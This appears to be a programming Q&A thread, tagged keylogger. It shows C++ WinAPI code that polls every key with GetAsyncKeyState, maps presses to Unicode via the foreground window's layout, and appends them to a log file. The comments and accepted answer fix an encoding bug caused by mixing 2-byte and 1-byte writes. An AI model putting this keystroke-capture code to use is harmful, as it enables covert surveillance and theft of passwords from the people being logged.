# How do I fix these encodings?

Tags: c++, winapi, keylogger

I'm making a program that captures all the keys the user enters & saves them to a file.

There's one problem I'm really confused with. Sometimes when I open the text file it seems like it's ALL in Unicode.

[image: screenshot]

I typed the Russian characters and they're correct.

However, sometimes the file is in a normal form.

[image: screenshot]

This converts the key to Unicode:

```
void writeScannedKey(unsigned char key)
{
    HWND windowHandle{ GetForegroundWindow() };
    DWORD threadID{ GetWindowThreadProcessId(windowHandle, NULL) };

    BYTE *keyState{ (BYTE*)malloc(256) };
    GetKeyboardState(keyState);

    HKL hkl{ GetKeyboardLayout(threadID) };

    wchar_t uniChar[16]{ 0 };

    UINT virtualKey{ (MapVirtualKeyEx(key, MAPVK_VK_TO_CHAR, hkl)) };

    ToUnicodeEx(virtualKey, key, keyState, uniChar, 16, 0, hkl);

    writeLog(uniChar);

    free(keyState);
}
```

The program loop (`writeScannedKey()` is the function above):

```
while (true)
{
    for (key = 8; key <= 222; ++key)
    {
        if (GetAsyncKeyState(key) == -32767)
        {
            if ((key >= 39) && (key < 91))
            {
                writeScannedKey(key);
                break;
            }

            if (isShitKey(key) == FALSE)
                writeLog4(key);
        }
    }
}
```

I have 3 different functions that accept a different data type from each other (I know, it's bad). The `WriteLog4` function is a function that I use to write normal characters to a file, `writeLog2` is used to print for example <kbd>ALT</kbd> key, <kbd>RWin</kbd> key, etc. & `writeLog` is a function which gets called from the `writeScannedKey()` function.

```
void writeLog(TCHAR *text)
{
    std::wstring s{ g_name };

    std::string name{ s.begin(), s.end() };

    std::string fullPath{ "\\\\.\\" + g_takePath + "\\" + name };
    
    HANDLE file{ CreateFileA(fullPath.c_str(), FILE_APPEND_DATA, FILE_SHARE_READ, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL) };
    WriteFile(file, text, wcslen(text) * sizeof(wchar_t), NULL, NULL);

    CloseHandle(file);
}

void writeLog2(LPCSTR text)
{
    std::wstring s{ g_name };

    std::string name{ s.begin(), s.end() };

    std::string fullPath{ "\\\\.\\" + g_takePath + "\\" + name };

    HANDLE file{ CreateFileA(fullPath.c_str(), FILE_APPEND_DATA, FILE_SHARE_READ, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL) };
    WriteFile(file, text, lstrlenA(text) * sizeof(char), NULL, NULL);

    CloseHandle(file);
}

void writeLog4(unsigned char text)
{
    std::wstring s{ g_name };

    std::string name{ s.begin(), s.end() };

    std::string fullPath{ "\\\\.\\" + g_takePath + "\\" + name };

    HANDLE file{ CreateFileA(fullPath.c_str(), FILE_APPEND_DATA, FILE_SHARE_READ, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL) };
    WriteFile(file, (LPCVOID)text, sizeof(text) / sizeof(char) * sizeof(char), NULL, NULL);

    CloseHandle(file);
}
```

Comment: https://en.wikipedia.org/wiki/Byte_order_mark

Comment: Check the file with a hex editor or non-notepad first. Notepad makes certain guesses about your file's encoding and you may be hitting it.

Comment: Your writeLog4 function treats its `unsigned char text` argument as an address to read random data from. You should pass `&text` to Writefile instead.

Comment: It's invalid no matter in what text editor.

Comment: Every time you use `writeScannedKey` to write, you write 2 bytes, but when you use `WriteLog4` to write, you only write 1 byte, so when you use UTF-16 to read, The character should be displayed in 1 bytes are combined with the following character and displayed as garbled characters.

Answer (score 0, accepted):

When you use the `writeScannedKey` function, the following codes all write two bytes to the file

```
 WriteFile(file, text, wcslen(text) * sizeof(wchar_t), NULL, NULL);
```

But when you use the `writeLog4` function, you only write one byte at a time:

```
WriteFile(file, (LPCVOID)text, sizeof(text) / sizeof(char) * sizeof(char), NULL, NULL);
```

When you use UTF-16 encoding to read a file, two bytes will be read as one character, a single byte will be combined with subsequent bytes, and then an error character will be displayed.